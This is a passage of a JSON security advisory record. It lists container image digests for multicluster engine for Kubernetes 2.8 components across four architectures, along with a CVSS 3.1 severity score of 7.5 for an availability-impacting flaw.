"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
